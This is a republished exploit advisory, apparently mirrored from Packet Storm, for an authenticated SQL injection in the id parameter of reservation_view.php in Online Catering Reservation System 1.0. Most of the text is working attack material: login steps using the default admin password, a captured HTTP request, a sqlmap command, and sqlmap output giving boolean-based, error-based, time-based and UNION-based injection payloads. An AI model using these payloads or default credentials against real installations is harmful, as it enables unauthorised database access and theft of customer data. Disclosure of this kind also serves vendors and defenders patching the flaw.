Online Catering Reservation System 1.0 SQL Injection ≈ Packet Storm – Digitalmunition




Exploit/Advisories no-image-featured-image.png

Published on February 27th, 2021 📆 | 5920 Views ⚑

0

Online Catering Reservation System 1.0 SQL Injection ≈ Packet Storm

# Exploit Title: Online Catering Reservation System – SQL Injection
(Authenticated)
# Date: 2021-02-25
# Exploit Author: [email protected]
# Vendor Homepage:
https://www.sourcecodester.com/php/11355/online-catering-reservation.html
# Software Link:
https://www.sourcecodester.com/sites/default/files/download/oretnom23/reservation.zip
# Version: v1.0
# Tested on: Ubuntu 20.04.2

Parameter id in reservation_view.php is vulnerable to SQL Injection.

POC

1) Visit http://VICTIM/admin/
2) Put the default pass: 123
3) Go to Reservation->Confirmed Reservation -> View reservation or visit
http://VICTIM/admin/reservation_view.php?id=1.
4) Save the request using Burp Suite as yourfile.txt
5) sqlmap -r yourfile.txt

REQUEST
——-
GET /admin/reservation_view.php?id=1 HTTP/1.1
Host: 192.168.1.117
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101
Firefox/78.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: sid=8spj19f306lim9ve5hg9iq56sf; lang=CZ;
PHPSESSID=mdmn8a55hibuh8pav5serqhum1
Upgrade-Insecure-Requests: 1

SQLMAP OUTPUT
————-
Parameter: id (GET)
Type: boolean-based blind
Title: OR boolean-based blind – WHERE or HAVING clause (NOT – MySQL
comment)
Payload: id=1′ OR NOT 3039=3039#

Type: error-based
Title: MySQL >= 5.0 OR error-based – WHERE, HAVING, ORDER BY or
GROUP BY clause (FLOOR)
Payload: id=1′ OR (SELECT 9283 FROM(SELECT
COUNT(*),CONCAT(0x716b6b7171,(SELECT
(ELT(9283=9283,1))),0x717a6a7071,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)– xbWN

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 OR time-based blind
Payload: id=1′ OR SLEEP(5)– hENp

Type: UNION query
Title: MySQL UNION query (NULL) – 24 columns
Payload: id=1′ UNION ALL SELECT
NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716b6b7171,0x535a755264454a726a6350517146596d615a77595a71666a63524372725a4a506a7973684a567251,0x717a6a7071)#

Source link

Tagged with:



Leave a Reply